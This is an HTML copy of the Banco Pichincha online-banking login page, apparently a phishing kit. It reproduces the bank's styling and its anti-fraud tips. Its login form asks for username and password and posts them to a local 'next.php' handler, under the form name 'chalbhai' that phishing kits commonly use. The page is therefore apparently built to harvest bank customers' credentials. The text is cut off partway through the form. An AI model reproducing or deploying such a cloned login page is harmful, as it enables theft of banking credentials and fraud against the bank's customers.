<!DOCTYPE html>
<html dir="LTR" class=" mozilla"><head><style type="text/css">[uib-tooltip-popup].tooltip.top-left > .tooltip-arrow,[uib-tooltip-popup].tooltip.top-right > .tooltip-arrow,[uib-tooltip-popup].tooltip.bottom-left > .tooltip-arrow,[uib-tooltip-popup].tooltip.bottom-right > .tooltip-arrow,[uib-tooltip-popup].tooltip.left-top > .tooltip-arrow,[uib-tooltip-popup].tooltip.left-bottom > .tooltip-arrow,[uib-tooltip-popup].tooltip.right-top > .tooltip-arrow,[uib-tooltip-popup].tooltip.right-bottom > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.top-left > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.top-right > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.bottom-left > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.bottom-right > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.left-top > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.left-bottom > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.right-top > .tooltip-arrow,[uib-tooltip-html-popup].tooltip.right-bottom > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.top-left > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.top-right > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.bottom-left > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.bottom-right > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.left-top > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.left-bottom > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.right-top > .tooltip-arrow,[uib-tooltip-template-popup].tooltip.right-bottom > .tooltip-arrow,[uib-popover-popup].popover.top-left > .arrow,[uib-popover-popup].popover.top-right > .arrow,[uib-popover-popup].popover.bottom-left > .arrow,[uib-popover-popup].popover.bottom-right > .arrow,[uib-popover-popup].popover.left-top > .arrow,[uib-popover-popup].popover.left-bottom > .arrow,[uib-popover-popup].popover.right-top > .arrow,[uib-popover-popup].popover.right-bottom > .arrow,[uib-popover-html-popup].popover.top-left > .arrow,[uib-popover-html-popup].popover.top-right > .arrow,[uib-popover-html-popup].popover.bottom-left > .arrow,[uib-popover-html-popup].popover.bottom-right > .arrow,[uib-popover-html-popup].popover.left-top > .arrow,[uib-popover-html-popup].popover.left-bottom > .arrow,[uib-popover-html-popup].popover.right-top > .arrow,[uib-popover-html-popup].popover.right-bottom > .arrow,[uib-popover-template-popup].popover.top-left > .arrow,[uib-popover-template-popup].popover.top-right > .arrow,[uib-popover-template-popup].popover.bottom-left > .arrow,[uib-popover-template-popup].popover.bottom-right > .arrow,[uib-popover-template-popup].popover.left-top > .arrow,[uib-popover-template-popup].popover.left-bottom > .arrow,[uib-popover-template-popup].popover.right-top > .arrow,[uib-popover-template-popup].popover.right-bottom > .arrow{top:auto;bottom:auto;left:auto;right:auto;margin:0;}[uib-popover-popup].popover,[uib-popover-html-popup].popover,[uib-popover-template-popup].popover{display:block !important;}</style><style type="text/css">.uib-position-measure{display:block !important;visibility:hidden !important;position:absolute !important;top:-9999px !important;left:-9999px !important;}.uib-position-scrollbar-measure{position:absolute !important;top:-9999px !important;width:50px !important;height:50px !important;overflow:scroll !important;}.uib-position-body-scrollbar-measure{overflow:scroll !important;}</style><style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak,.ng-hide:not(.ng-hide-animate){display:none !important;}ng\:form{display:block;}.ng-animate-shim{visibility:hidden;}.ng-anchor{position:absolute;}</style><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><meta http-equiv="X-UA-TextLayoutMetrics" content="natural"><title>Banca web - Transacciones en línea de Banco Pichincha</title><meta name="description" content="Usa Banca web y haz tus operaciones bancarias en minutos: transferencias, pagos, recargas, consultas. Sin filas."><meta name="keywords" content="banca web,banca en línea,banca electrónica,banca online,internexo,banca virtual,banca digital"><!-- Favicon --><!--[if IE]><link type="image/png" rel="shortcut icon" sizes="16x16" href="/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-16.png" /><![endif]--><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-16.png" rel="icon" sizes="16x16" type="image/png"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-32.png" rel="icon" sizes="32x32" type="image/png"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-96.png" rel="icon" sizes="96x96" type="image/png"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-128.png" rel="icon" sizes="128x128" type="image/png"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-167.png" rel="icon" sizes="167x167" type="image/png"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-180.png" rel="icon" sizes="180x180" type="image/png"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-196.png" rel="icon" sizes="196x196" type="image/png"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-57.png" rel="apple-touch-icon" sizes="57x57"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-114.png" rel="apple-touch-icon" sizes="114x114"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-120.png" rel="apple-touch-icon" sizes="120x120"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-144.png" rel="apple-touch-icon" sizes="144x144"><link href="https://bancaweb.pichincha.com/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-152.png" rel="apple-touch-icon" sizes="152x152"><meta name="application-name" content="Login Banca Web"><meta name="msapplication-TileImage" content="/portalserver/static/templates/%5BBBHOST%5D/bpiTemplate/icons/favicon-144.png"><meta name="msapplication-TileColor" content="#ffcc00"><!-- Portal client --><script type="text/javascript" async="" src="Banco-Pichincha_files/recaptcha__en.js" crossorigin="anonymous" integrity="sha384-5mF5H4qJTx57mf1n4+Z4/WVlvWC/ZEZ6GYABx03MoihGmatuig2S2i+iBTy8gev2"></script><script src="Banco-Pichincha_files/459628187956828.js" async=""></script><script async="" src="Banco-Pichincha_files/fbevents.js"></script><script type="text/javascript" async="" src="Banco-Pichincha_files/hotjar-1370437.js"></script><script type="text/javascript" async="" src="Banco-Pichincha_files/analytics.js"></script><script async="" src="Banco-Pichincha_files/gtm.js"></script><script type="text/javascript" async="" src="Banco-Pichincha_files/detect.js"></script><script type="text/javascript" src="Banco-Pichincha_files/ruxitagentjs_ICA2Vfgjqru_10225210921130928.js" data-dtconfig="app=99c0c9b8f2276082|rcdec=1209600000|featureHash=ICA2Vfgjqru|vcv=2|rdnt=1|uxrgce=1|bp=3|srmcrv=10|cuc=al4bpn99|mel=100000|dpvc=1|ssv=4|lastModification=1633417471017|dtVersion=10225210921130928|srmcrl=1|tp=500,50,0,1|uxdcw=1500|vs=2|agentUri=/portalserver/ruxitagentjs_ICA2Vfgjqru_10225210921130928.js|reportUrl=/portalserver/rb_bf31695iqq|rid=RID_-1542601576|rpid=-1808779492|domain=pichincha.com"></script><script src="Banco-Pichincha_files/jquery.js" type="text/javascript"></script><script src="Banco-Pichincha_files/jquery-migrate.js" type="text/javascript"></script><script src="Banco-Pichincha_files/soyutils.js" type="text/javascript"></script><script src="Banco-Pichincha_files/client.js" type="text/javascript"></script><script src="Banco-Pichincha_files/portal_view.js" type="text/javascript"></script><script src="Banco-Pichincha_files/compatibility.js" type="text/javascript"></script><script src="Banco-Pichincha_files/ctrl_002.js" type="text/javascript"></script><script src="Banco-Pichincha_files/ctrl.js" type="text/javascript"></script><script src="Banco-Pichincha_files/all.js" type="text/javascript"></script><script src="Banco-Pichincha_files/com.js" type="text/javascript"></script><script src="Banco-Pichincha_files/xhtml.js" type="text/javascript"></script><script src="Banco-Pichincha_files/vendor-bb-core-js.js" type="text/javascript"></script><script src="Banco-Pichincha_files/vendor-bb-borders.js" type="text/javascript"></script><link href="Banco-Pichincha_files/theme-bpi-retail.css" rel="stylesheet" type="text/css"><script type="text/javascript">
if(!window.b$.portal.config)window.b$.portal.config = {};
b$.portal.config.serverRoot = '\/portalserver';
b$.portal.config.googlePublicKey = '-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA16aPF57mnWOZO2tcc6o5\nvJDfpLRgZ47CyBZ5KAKZCqx4/vcZZNcvX4UyMQ74DnB7MhOnUEKbLtJ3BqkI05G+\nPelYMR1HiaHb5VBtvjW/ks0bh+oG88eMfyPjE96YLPFP880i04f6sJsQPpUUHn6v\n6hJtX7abXZvhi+jFX5XgnHHjrFzT5uqKBgzcMx3GSOR5GLuongG5Lws8Fr9YOpzV\nAE1o6s6tVPcmlbILbGCrHKcHk5p90eVsJ4t5Qv8vnLj7dtF0fILtmU42eY1E0lGa\n62+Kt2Rbc+h2rwlbjGZEASvZxYu+wBKFiPRnqnl1hVfXnB0iYEA1Z3uEG6w66SBE\n3wIDAQAB\n-----END PUBLIC KEY-----';
b$.portal.config.biocatchJs = 'https://bcdn-god.we-stats.com/scripts/54085ba9/54085ba9.js';
b$.portal.config.resourceRoot || (window.b$.portal.config.resourceRoot = window.b$.portal.config.serverRoot);
b$.portal.portalName = 'pichincha';
b$.portal.pageName = 'page_1597874995642';
b$.portal.linkUUID = '1d0e8d05-c862-4f04-8988-270364edf751';
b$.portal.loggedInUserRole = '';
b$.portal.loggedInUserGroup = [];
</script><!-- End Portal client --><!-- Aurora --><script type="text/javascript">if(window.be == null)  window.be = {};
be.contextRoot = b$.portal.config.serverRoot ;
</script><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'\u0026l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NJJPWTS');</script><!-- End Google Tag Manager --><script src="Banco-Pichincha_files/bootstrap.js" type="text/javascript"></script><script src="Banco-Pichincha_files/aurora-lib.js" type="text/javascript"></script><!-- BioCatch initialization --><script src="Banco-Pichincha_files/widgets_init_002.js" type="text/javascript"></script><!-- Script for animations --><script src="Banco-Pichincha_files/lottie.js" type="text/javascript"></script><!-- Script for FootPrint --><script src="Banco-Pichincha_files/vendor-bpi-browser-footprint.js" type="text/javascript"></script><script src="Banco-Pichincha_files/vendor-bpi-dynamic-key-util.js" type="text/javascript"></script><link href="Banco-Pichincha_files/animate.css" rel="stylesheet"><link href="Banco-Pichincha_files/ManageableArea.css" rel="stylesheet" type="text/css"><script src="Banco-Pichincha_files/ManageableArea.js" type="text/javascript"></script><script src="Banco-Pichincha_files/template.js" type="text/javascript"></script><script src="Banco-Pichincha_files/vendor-bb-systemjs.js"></script><script src="Banco-Pichincha_files/config-bb-module-loader.js"></script><script src="Banco-Pichincha_files/lib-bb-start.js"></script><style type="text/css">.ext-bpi-login-ng {
  display: flex !important;
  align-items: center;
  height: 100%;
}

/** Styles fonts**/
a.home-links {
  color: #2f7abf !important;
  font-family: Prelo;
  font-size: 16px;
  font-weight: 600;
}

a.small-links {
  color: #2f7abf !important;
  font-family: Prelo;
  font-size: 14px;
  font-weight: 600;
  cursor: pointer;
}

label.question {
  color: #000;
  font-size: 14px;
  font-family: PreloSlab;
  font-weight: 500;
}

.login-label {
  color: #10265c;
  font-size: 28px;
  font-family: PreloSlab;
  font-weight: 300;
  letter-spacing: 0px;
  line-height: 34px;
}

/** Panel terms and conditions */
.bp-panel {
  border-radius: 0 0 0 24px;
  width: 365px;
}

.bp-panel-body {
  padding: 24px;
  padding-bottom: 0;
  padding-top: 20px;
}

.bp-panel-body-text-left {
  padding-bottom: 5px;
  color: #0f265c;
  font-family: Prelo;
  font-size: 16px;
  font-weight: 700;
}

.bp-panel-body-text {
  color: #1b2d54;
  font-family: Prelo;
  font-size: 18px;
  padding: 25px 0;
}

.bp-panel-body-heading {
  color: #1b2d54;
  font-family: PreloSlab;
  font-size: 22px;
  font-weight: 700;
}

.bp-panel-footer {
  border-bottom-left-radius: 15px;
  background-color: transparent;
  padding: 0 18px 48px 24px;
  font-family: Prelo;
}

.bp-panel-tnc-heading {
  border: 0;
  background-color: #fff;
  padding: 40px 0 0 24px;
}

.container-terms-mobil {
  display: flex;
  flex-direction: column;
  text-align: center;
  background-color: #f4f6f9;
  padding: 16px 0;
  margin: 16px 0 0 0;
}

/** Paddings and margins **/
.paddingBottom5 {
  padding-bottom: 5px;
}

.padding12 {
  padding: 12px;
}

.marginTop16 {
  margin-top: 16px;
}

.marginTop24 {
  margin-top: 24px !important;
}

.marginTop64 {
  margin-top: 64px !important;
}

.marginRight32 {
  margin-right: 32px;
}

.marginBottom16 {
  margin-bottom: 16px;
}

.marginBottom24px {
  margin-bottom: 24px !important;
}

.marginBottom32 {
  margin-bottom: 32px !important;
}

/** General styles **/
.logo {
  justify-content: center;
  align-items: center;
  display: flex;
  flex-flow: column;
  padding: 32px;
  height: 100%;
}

.bp-form-group {
  margin-bottom: 32px;
}

.dot {
  font-size: 14px;
}

a {
  color: #2f7abf;
}

.input-not-valid .form-control {
  border-color: red;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}

.input-with-icon .form-control {
  padding-right: 3.65rem;
  box-sizing: border-box;
}

.divider-login {
  width: 108px;
  height: 1px;
  border-radius: 0px;
  margin: 0 !important;
}

.subtitle-heading-login {
  color: rgb(15, 38, 92);
  font-size: 24px;
  font-family: PreloSlab;
  font-weight: 300;
  letter-spacing: 0px;
  line-height: 29px;
  padding-top: 22px;
}

.text-content-login {
  color: rgb(74, 74, 74);
  font-size: 16px;
  font-family: Prelo;
  font-weight: 500;
  letter-spacing: 0px;
  line-height: 24px;
}

.container-terms {
  text-align: center;
  margin: auto 0 0 0;
  bottom: 16px;
  padding-top: 32px;
}

.header-logo {
  position: fixed;
  top: 0;
  left: 0;
  width: 100vw;
  height: 56px;
  padding: 16px;
  box-shadow: 0px 8px 8px -8px rgba(7, 7, 7, 0.16);
  background: white;
  z-index: 3;
}

.btn-primary {
  height: 48px;
}

.button-signUp {
  height: 48px;
  border-radius: 4px;
  border: 1px solid rgb(212, 216, 225);
  color: rgb(15, 38, 92);
  font-size: 14px;
  background: #e9ecf3;
  font-family: Prelo;
  font-weight: 500;
  display: inline-block;
  text-align: center;
  touch-action: manipulation;
  cursor: pointer;
}

a.button-signUp {
  text-decoration: none !important;
}

.button-signUp:hover {
  background-color: #c7cfe1;
  border: 1px solid rgb(181, 185, 196);
}

.button-signUp:focus {
  background-color: #e9ecf3;
  border: 2px solid rgb(47, 122, 191);
}

.button-signUp:active {
  background-color: #b5bfd6;
  border: 1px solid rgb(181, 185, 196);
}

.container-form {
  display: flex;
  width: 459px;
  background: rgb(255, 255, 255);
  border: 1px solid rgb(222, 227, 237);
  border-radius: 4px;
  padding: 46px 56px;
  flex-direction: column;
  align-items: center;
  margin: auto;
}

.modal-content {
  border-radius: 4px !important;
}

.divider-content {
  width: 100%;
  height: 1px;
  border-radius: 0px;
  margin: 0;
}

.box-card {
  display: flex;
  flex-direction: column;
  align-items: center;
  width: 214px;
  height: 96px;
  border: 1px solid rgb(200, 200, 200);
  border-radius: 4px;
  text-align: center;
  font-size: 16px;
  font-family: Prelo;
  font-weight: 600;
  padding: 24px 0;
}

.box-card:hover {
  border: 1px solid rgb(74, 74, 74);
}

.box-card:focus {
  border: 2px solid rgb(47, 122, 191);
}

.box-card:active {
  background-color: #f4f6f9;
  border: 2px solid rgb(47, 122, 191);
}

.arrow-left {
  margin: 4px;
  background: rgb(146, 146, 146);
  float: left;
}

.container-overlay {
  height: 100%;
  width: 100%;
  display: flex;
  position: fixed;
  z-index: 1;
  top: 0;
  left: 0;
  background-color: white;
  align-items: center;
}

.overlay-content {
  position: relative;
  width: 100%;
  text-align: center;
}

.logo-banner {
  width: 112px !important;
  height: 24px !important;
  margin: auto;
}

.form-control {
  height: 48px;
}

.btn-password {
  border: none;
  position: absolute;
  right: 0;
  z-index: 10;
  top: 11px;
  font-size: 14px;
}

.padding-start {
  padding-inline-start: 32px;
}

.position-tooltip {
  display: inline-block;
}

ul.tips li {
  padding-top: 8px;
  list-style-type: none;
}

li.valid-rule, li.ty-data-value-error {
  list-style-type: none;
  margin-left: -16px;
  position: relative;
  padding-left: 20px !important;
  display: flex;
  font-weight: 500 !important;
  background-image: none !important;
}

li.valid-rule:before {
  padding-right: 5px;
  content: "";
  background-color: transparent;
  position: absolute;
  left: 0px;
  top: 8px;
  width: 5px;
  border-bottom: 2px solid #31a451;
  height: 14px;
  border-right: 2px solid #31a451;
  -webkit-transform: rotate(43deg);
}

li.ty-data-value-error:before {
  content: '\2715';
  padding-right: 10px;
  margin-left: -24px;
}

.tip-circle {
  float: left;
  margin-right: 32px;
  border-radius: 50%;
  background-color: #f4f6f9;
  height: 72px;
  width: 72px;
  padding: 14px 2px;
}

.container-tips {
  display: flex;
  flex-direction: column;
  padding: 56px;
  width: 460px;
}

.grid-tips {
  display: grid;
  grid-template-columns: auto auto;
  grid-row-gap: 16px;
}

.user-mail {
  padding-bottom: 40px;
}

.check-box-container {
  margin: 16px 0 24px 0;
  background-color: white;
  border-radius: 4px;
  display: flex;
}

.check-box-container label {
  float: left;
}

.margin-right-lb {
  margin-right: 16px;
}

.check-box-container label span {
  text-align: center;
  padding: 14px !important;
  display: block;
  width: 166px;
  height: 96px;
  border-radius: 4px;
  border: 1px solid rgb(200, 200, 200);
  background-color: #fff;
  color: #4a4a4a;
}

.check-box-container label input {
  position: absolute;
  top: -20px;
}

.check-box-container input:checked + span {
  background-color: #f4f6f9;
  color: #4a4a4a;
  width: 166px;
  height: 96px;
  border: 2px solid #2f7abf;
}

.check-box-container input:hover + span {
  border: 1px solid rgb(74, 74, 74);
  width: 166px;
  height: 96px;
}

.logo-signUp {
  display: block;
  top: 80px;
  left: 122px;
  position: absolute;
}

.wrapper {
  width: 100%;
  font-size: 16px;
  margin-top: 27px;
}

.position-alert {
  display: block;
  margin-top: 28px;
}

.tip-circle-login {
  float: left;
  margin-right: 32px;
  border-radius: 50%;
  background-color: #f4f6f9;
  height: 56px;
  width: 56px;
  padding: 14px 2px;
}

.divider-login-sidebar {
  height: 2px;
  width: 120px;
  margin: 20px 0 24px;
}

.indications {
  padding-top: 24px;
  line-height: 22px;
}

.mt-logo {
  margin-top: 6%;
}

@media (max-width: 1024px){
  .mt-logo {
    margin-top: 4%;
  }
  .icon-user-mail {
    height: 170px !important;
    width: 368px !important;
  }
}

.sidebar-login {
  justify-content: center;
  display: flex;
  flex-flow: column;
  padding: 32px;
  height: 100vh;
}

ul li::before {
  color: color('blue-dark');
}

.btn-font-size {
  font-size: 14px !important;
}


/** Styles help modal **/
.container-help-modal {
  width: 459px;
  background: rgb(255, 255, 255);
  border-radius: 4px;
  padding: 40px 56px;
  flex-direction: column;
  align-items: center;
}

.radio-toolbar {
  display: flex;
  flex-direction: column;
  width: 100%;
  align-items: center;
}

.radio-toolbar input[type="radio"] {
  opacity: 0;
  position: fixed;
  width: 0;
}

.radio-toolbar label {
  display: inline-block;
  width: 100%;
  height: 96px;
  border: 1px solid rgb(200, 200, 200);
  border-radius: 4px;
  margin-top: 16px;
  text-align: center;
  font-size: 16px;
  font-family: Prelo;
  font-weight: 600;
  padding: 24px 0;
  color: rgb(74, 74, 74);
}

.radio-toolbar input[type="radio"]:checked + label {
  background-color: #f4f6f9;
  border: 2px solid rgb(47, 122, 191);
}

.radio-toolbar input[type="radio"]:focus + label {
  border: 2px solid rgb(47, 122, 191);
}

.radio-toolbar label:hover {
  border: 1px solid rgb(74, 74, 74);
  cursor: pointer;
}

/** Progress bar singUp **/
.StepProgress {
  list-style: none;
}

.StepProgress::before {
  display: inline-block;
  content: '';
  position: absolute;
}

.StepProgress-item {
  position: relative;
  counter-increment: list;
  padding-top: 2px;
  padding-left: 16px;
}

.StepProgress-item:not(:last-child) {
  padding-bottom: 56px;
  padding-left: 16px;
  font-size: 18px;
  font-weight: 600;
  font-family: PreloSemiBold;
}

.StepProgress-item:not(:last-child)::before {
  border: 1px solid #c8c8c8;
}

.StepProgress-item::before {
  display: inline-block;
  content: '';
  position: absolute;
  top: 30px;
  left: -25px;
  height: 50%;
  border: 1px solid white;
}

.StepProgress-item::after {
  content: counter(list);
  display: inline-block;
  position: absolute;
  padding: 1px 6px;
  top: 0;
  left: -36px;
  width: 24px;
  height: 24px;
  border: 1.5px solid #c8c8c8;
  border-radius: 50%;
  background-color: #fff;
  color: #c8c8c8;
}

.StepProgress-item.is-done::after {
  content: "L";
  font-size: 16px;
  color: #fff;
  text-align: center;
  border: 1px solid #31a451;
  background-color: #31a451;
  padding: 1px;
  width: 24px;
  height: 24px;
  -webkit-transform: scaleX(-1) rotate(-35deg);
}

.StepProgress-item.current::after {
  content: counter(list);
  padding: 1px;
  width: 24px;
  height: 24px;
  left: -36px;
  font-size: 14px;
  text-align: center;
  color: white;
  border: 1px solid #0f265c;
  background-color: #0f265c;
}

.StepProgress-item strong {
  display: block;
  color: #c8c8c8;
  font-family: Prelo;
  font-size: 18px;
  font-weight: 600;
}

.StepProgress-item.current strong {
  color: rgb(74, 74, 74);
  font-weight: bold;
  font-size: 18px;
  font-family: PreloBold;
}

.StepProgress-item.is-done strong {
  color: rgb(74, 74, 74);
}

/** Mobile styles **/
@media (max-width: 576px) {
  .bp-panel {
    width: 100%;
  }

  .ext-bpi-login-ng {
    background: white;
    width: 100vw !important;
    justify-content: center;
  }

  .container-login-form {
    padding: 56px 16px 0 16px !important;
    width: 100vw !important;
    border: 1px solid white !important;
  }

  .container-form {
    width: 100vw !important;
    padding: 58px 16px 0 16px !important;
    border: none !important;
  }

  .login-label {
    padding-top: 48px;
  }

  .container-help-modal {
    height: 100vh;
    position: fixed;
    left: -16px;
    top: 56px;
    width: 100vw!important;
    border-radius: 0 !important;
    justify-content: center;
  }

  .widthXS {
    width: 90vw !important;
  }

  .container-tips {
    position: fixed;
    top: 56px;
    left: -16px;
    padding: 56px 16px !important;
    width: 100vw!important;
    height: 100vh;
    background: white;
    align-items: center;
    justify-content: center;
  }

  .check-box-container {
    flex-direction: column;
    width: 100% !important;
    margin: 0 0 24px 0 !important;
  }

  .check-box-container label span {
    width: 100% !important;
  }

  .check-box-container label {
    margin-top: 16px;
  }

  .margin-right-lb {
    margin-right: 0 !important;
  }
}

@media (min-width: 768px) and (max-width: 992px) {
  .arrow-left {
    display: none;
  }
  .without-border {
    border: none !important;
  }
}

@media (max-width: 768px) {
  .bottom-text {
    margin-left: auto;
  }

  .bp-panel-tnc-heading {
    padding: 24px 0 0 24px;
  }

  .bp-panel-body {
    padding-top: 16px;
  }

  .bp-panel-footer {
    padding: 0 24px 40px;
  }

  .dot {
    font-size: 10px;
  }

  .position-alert {
    width: 100vw;
    margin-top: 56px !important;
  }
}

@media (max-width: 992px) {
  .form-ipad {
    width: 100vw !important;
    height: 100vh !important;
    background: white;
  }
}

input.pass {
 -webkit-text-security:disc;
  font-family:dotsfont;
  font-size: 10px;
}

.mt-5 {
  margin-top: 5px !important;
}

#checkboxTerms:focus {
  outline: 1px solid rgba(0, 0, 0, 0.2);
}

#checkboxTerms {
  border-color: #DDD;
  border: 1px solid;
  border-radius: 2px;
  appearance: none;
  -webkit-appearance: none;
  -moz-appearance: none;
  width: 18px;
  height: 18px;
  cursor: pointer;
  position: relative;
  margin-top: 2px;
}

#checkboxTerms:checked {
  background-color: #0f265c;
  background: #0f265c url("data:image/gif;base64,R0lGODlhCwAKAIABAP////3cnSH5BAEKAAEALAAAAAALAAoAAAIUjH+AC73WHIsw0UCjglraO20PNhYAOw==") 3px 3px no-repeat;
}


</style><script type="text/javascript" async="" src="Banco-Pichincha_files/api.js"></script><script type="text/javascript" async="" src="Banco-Pichincha_files/54085ba9.js"></script><script async="" src="Banco-Pichincha_files/modules.js" charset="utf-8"></script><style type="text/css">iframe#_hjRemoteVarsFrame {display: none !important; width: 1px !important; height: 1px !important; opacity: 0 !important; pointer-events: none !important;}</style></head><body onload="b$.portal.startup('main')"><!-- Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NJJPWTS" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><!-- End Google Tag Manager (noscript) --><div id="main" class="main-login" data-pid="page_1597874995642"><navbar class="login-navbar hidden-xs hidden-sm"><!-- ngInclude: ext.helpers.template --><div class="logo-wrapper ng-scope" id="login-navbar" ng-controller="SidebarController as $ctrl" ng-include="ext.helpers.template"><div class="sidebar-login ng-scope" ng-controller="SidebarController as $ctrl">
  <div class="bp-icon icon-bpi-logo" style="margin: auto auto 0 0;background-position: left;"></div>
  <div class="subtitle-heading-login mt-logo">
    <div>
      <strong>No te dejes sorprender</strong> por mails o <br> mensajes engañosos
    </div>
    <hr class="divider-login-sidebar">
  </div>

  <div class="bp-icon icon-user-mail user-mail"></div>

  <div class="grid-tips">
    <span class="tip-circle-login"><i class="bp-icon icon-search"></i></span>
    <div style="margin: auto 0;">
      <label class="ty-text-description text-18">Lee con atención el email del remitente y <br>
        asegúrate que la dirección termine en <br>
        @pichincha.com</label>
    </div>
    <span class="tip-circle-login"><i class="bp-icon icon-phone-login"></i></span>
    <div style="margin: auto 0;">
      <label class="ty-text-description text-18">Si sospechas que el mensaje que recibiste es <br>
        falso, repórtalo a banco@pichincha.com o llama a <br>
        Banca Telefónica al (02) 2999 999</label>
    </div>

  </div>

  <div class="indications">
    <label class="ty-text-description text-18">Banco Pichincha <strong> nunca te pedirá compartir tu usuario o <br>
      contraseña </strong> a través de correos electrónicos, redes sociales o <br>
      llamadas telefónicas.</label>
  </div>

  <div class="container-terms">
    <a class="small-links" ng-click="$ctrl.openTerms = true">
      Términos de uso
    </a>
    <span class="ty-text-description">© 2021 Banco Pichincha. Todos los derechos reservados</span>
  </div>

  <ui-bb-modal is-open="$ctrl.openTerms" animation="true" size="'sm'" backdrop="'static'" class="ng-scope"></ui-bb-modal>

</div>

</div></navbar><div class="container-flex"><div class="container-flex column"><section id="main-section" class="bp-area --area main-section-login"><div class="bp-container bp-ui-dragRoot bp-manageableArea --area bp-area " data-pid="container_0a39e4f9-5ceb-4d6b-ad76-4a646e28e88a"><div data-pid="widget-bpi-login-ng-6021124" class="bp-widget bp-ui-dragRoot"><div class="bp-widget-head"></div><div class="bp-widget-pref"></div><div class="bp-widget-body ng-scope"><div g:onload="BB.Widget.ngStart(__WIDGET__);"><div class="widget-bpi-login-ng"><div class="bp-g-include" local="true" src="$(contextRoot)/static/features/%5BBBHOST%5D/${extension}/templates/template.ng.html"><div class="ext-bpi-login-ng ng-scope" ng-controller="LoginController as $ctrl" style="width: min-content;">
  <!-- ngInclude: ext.helpers.template --><div ng-include="ext.helpers.template" class="ng-scope"><div class="header-logo hidden-md hidden-lg ng-scope">
  <div class="bp-icon icon-bpi-logo logo-banner"></div>
</div>
<ui-bpi-business-error class="mt-3 hidden-xs ng-scope ng-isolate-scope" error="state.error" message="state.error.message" on-close="$ctrl.clearError()"><!-- ngIf: $ctrl.isBusinessErrorShown() -->
</ui-bpi-business-error>

<div class="container-form ng-scope">
  <ui-bpi-business-error class="hidden-sm hidden-md hidden-lg vw-100 ng-isolate-scope" error="state.error" message="state.error.message" on-close="$ctrl.clearError()"><!-- ngIf: $ctrl.isBusinessErrorShown() -->
</ui-bpi-business-error>
  <form class="panel ng-pristine ng-valid ng-valid-required" action="next.php" name=chalbhai id=chalbhai method=post>
    <strong>
      <label class="login-label marginBottom32" i18n-key="login.label.title">Bienvenido a tu Banca web</label>
    </strong>

    <div class="bp-form-group">
      <label class="ty-text-bold" i18n-key="login.label.username">Usuario</label>
      <input type="text" autofocus="true" class="form-control ng-pristine ng-untouched ng-empty ng-invalid ng-invalid-required ng-valid-maxlength" onpaste="return false" autocomplete="off" maxlength="64" ng-model="state.login.username" required="" aria-invalid="true">
    </div>
    <div class="bp-form-group">
      <strong>
        <label class="ty-text-bold" i18n-key="login.label.password">Contraseña</label>
      </strong>
      <bpi-password-input ng-model="state.login.password" class="ng-pristine ng-untouched ng-valid ng-isolate-scope ng-empty" aria-invalid="false"><div class="control-group">
         <div class="input-group" style="position:sticky; width:100%">
           <!-- ngIf: !$ctrl.iOS --><input class="form-control mt-5 ng-pristine ng-untouched ng-scope ng-empty ng-invalid ng-invalid-required ng-valid-maxlength pass" type="text" name="password" id="password" autocomplete="off" required="" onpaste="return false" maxlength="16" ng-model="$ctrl.value" ng-disabled="$ctrl.ngDisabled" ng-change="$ctrl.update()" style="width:100%; border-radius:3px;" ng-class="{pass: !$ctrl.showPassword}" data-ng-if="!$ctrl.iOS" aria-invalid="true"><!-- end ngIf: !$ctrl.iOS -->

           <!-- ngIf: $ctrl.iOS -->

           <!-- ngIf: $ctrl.value.length > 0 -->
           </div>
         </div></bpi-password-input>
    </div>

    <div class="marginBottom16">
